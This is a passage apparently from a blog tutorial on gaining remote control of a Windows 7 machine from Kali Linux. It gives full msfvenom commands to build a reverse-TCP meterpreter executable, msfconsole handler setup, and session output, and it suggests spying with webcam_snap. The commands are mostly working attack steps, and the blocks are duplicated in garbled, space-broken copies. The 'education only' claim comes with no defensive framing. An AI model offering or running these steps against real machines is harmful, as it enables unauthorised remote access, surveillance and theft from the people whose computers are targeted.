Kali Linux is derived from Debian Linux flavor and its mainly used for penetration tasting. It has more than 300 pre-installed penetration-testing programs. It is a supported platform of the Metasploit Project’s Metasploit Framework, a tool for developing and executing security exploits. Let begin with hack windows with Kali Linux.Kindly note that , I am writing this post for education purpose only.

Source machine details:

Kali Linux

root@kali:/# uname -a Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux root@kali:/# 1 2 3 root @ kali : / # uname -a Linux kali 4.6.0 - kali1 - amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux root @ kali : / #

Target machine used for hacking:

Windows 7 Ultimate SP1 1 Windows 7 Ultimate SP1

Step 1. Create Payload

Payload is a program which is similar as a virus or trojan which get executed on the remote machine for hacking purpose. To create payload program use below command which will hack windows with Kali Linux.

root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 333 bytes Final size of exe file: 73802 bytes Saved as: /root/program.exe root@kali:/# ls -la /root/program.exe -rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe 1 2 3 4 5 6 7 8 9 root @ kali : / # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe No platform was selected , choosing Msf :: Module :: Platform :: Windows from the payload No Arch selected , selecting Arch : x86 from the payload No encoder or badchars specified , outputting raw payload Payload size : 333 bytes Final size of exe file : 73802 bytes Saved as : / root / program . exe root @ kali : / # ls -la /root/program.exe - rw - r -- r -- 1 root root 73802 Jan 26 00 : 46 / root / program . exe

With ls command we have confirmed that our Payload program is successfully created at the given location.

Step 2: Run mfsconsole command which will start msf prompt.

root@kali:# msfconsole .,,. . .\$$$$$L..,,==aaccaacc%#s$b. d8, d8P d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88' d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P 88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88 .a#$$$$$$"` 88b d8P 88b`?8888P' ,s$$$$$$$"` 888888P' 88n _.,,,ass;: .a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$' .a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$' ,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS' .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$' _______________________________________________________________ ,&$$$$$$'_____ ll&&$$$$' .;;lll&&&&' ...;;lllll&' ......;;;llll;;;.... ` ......;;;;... . . Taking notes in notepad? Have Metasploit Pro track & report your progress and findings -- learn more on http://rapid7.com/metasploit =[ metasploit v4.12.22-dev ] + -- --=[ 1577 exploits - 906 auxiliary - 272 post ] + -- --=[ 455 payloads - 39 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 root @ kali : # msfconsole . , , . . . \ $ $ $ $ $ L . . , , == aaccaacc % #s$b. d8, d8P d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p d888888P '7$$$$\""""' '^^`` .7$$$|D*"' ` ` ` ? 88 ' d8bd8b.d8p d8888b ?88' d888b8b _ . os #$|8*"` d8P ?8b 88P 88P ` ? P '?P d8b_,dP 88P d8P' ? 88 . oaS ###S*"` d8P d8888b $whi?88b 88b d88 d8 ? 8 88b 88b 88b , 88b . osS $ $ $ $ * " ?88,.d88b, d88 d8P' ?88 88P `?8b d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*" ` ` ? 88 ' ?88 ?88 88b d88 d88 .a#$$$$$$"` 88b d8P 88b`?8888P' , s $ $ $ $ $ $ $ "` 888888P' 88n _.,,,ass;: .a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$' .a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$' ,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS' .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--" " '' ^ ^ / $ $ $ $ $ $ ' _______________________________________________________________ ,&$$$$$$' _____ ll && $ $ $ $ ' .;;lll&&&&' . . . ; ; lllll & ' . . . . . . ; ; ; llll ; ; ; . . . . ` . . . . . . ; ; ; ; . . . . . Taking notes in notepad ? Have Metasploit Pro track & report your progress and findings -- learn more on http : //rapid7.com/metasploit = [ metasploit v4 . 12.22 - dev ] + -- -- = [ 1577 exploits - 906 auxiliary - 272 post ] + -- -- = [ 455 payloads - 39 encoders - 8 nops ] + -- -- = [ Free Metasploit Pro trial : http : //r-7.co/trymsp ] msf >

Step 3: For exploiting I have used following details:

Port 4444: you can use as per your choice

LHOST IP: which is nothing but the Kali Linux machines IP 192.168.189.128. to Know ip of your kali machine use below command.

root@kali:/# ip r l 192.168.189.0/24 dev eth0 proto kernel scope link src 192.168.189.128 metric 100 root@kali:/# 1 2 3 root @ kali : / # ip r l 192.168.189.0 / 24 dev eth0 proto kernel scope link src 192.168.189.128 metric 100 root @ kali : / #

Now give following command at msf prompt “use exploit/multi/handler”

msf > use exploit/multi/handler msf exploit(handler) > 1 2 msf > use exploit / multi / handler msf exploit ( handler ) >

Then give command “set payload windows/meterpreter/reverse_tcp” at the next prompt:

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp 1 2 msf exploit ( handler ) > set payload windows / meterpreter / reverse_tcp payload = > windows / meterpreter / reverse_tcp

Now set local IP and port using LHOST and LPORT command as below:

msf exploit(handler) > set lhost 192.168.189.128 lhost => 192.168.189.128 msf exploit(handler) > set lport 4444 lport => 4444 1 2 3 4 msf exploit ( handler ) > set lhost 192.168.189.128 lhost = > 192.168.189.128 msf exploit ( handler ) > set lport 4444 lport = > 4444

and finally give exploit command.

msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.189.128:4444 [*] Starting the payload handler... 1 2 3 4 msf exploit ( handler ) > exploit [ * ] Started reverse TCP handler on 192.168.189.128 : 4444 [ * ] Starting the payload handler . . .

Now you need to execute the “program.exe” on the windows machine once its executed on target machine , you can able to establish a meterpreter session. Just type sysinfo to get the details hacked windows machine.

msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.189.128:4444 [*] Starting the payload handler... [*] Sending stage (957999 bytes) to 192.168.189.1 [*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000 meterpreter > sysinfo Computer : MANN-PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 (Current Process is WOW64) System Language : en_IN Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/win32 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 msf exploit ( handler ) > exploit [ * ] Started reverse TCP handler on 192.168.189.128 : 4444 [ * ] Starting the payload handler . . . [ * ] Sending stage ( 957999 bytes ) to 192.168.189.1 [ * ] Meterpreter session 1 opened ( 192.168.189.128 : 4444 -> 192.168.189.1 : 53091 ) at 2017 - 01 - 26 00 : 51 : 31 + 0000 meterpreter > sysinfo Computer : MANN - PC OS : Windows 7 ( Build 7601 , Service Pack 1 ) . Architecture : x64 ( Current Process is WOW64 ) System Language : en_IN Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86 / win32

Once you successfully get this details you can do more exploit or get more information using “help” command which will show all the options by which you can hack the system e.g. to get the webcam snap use command “webcam_snap” same way you can use many available option available. Happy hacking!!!!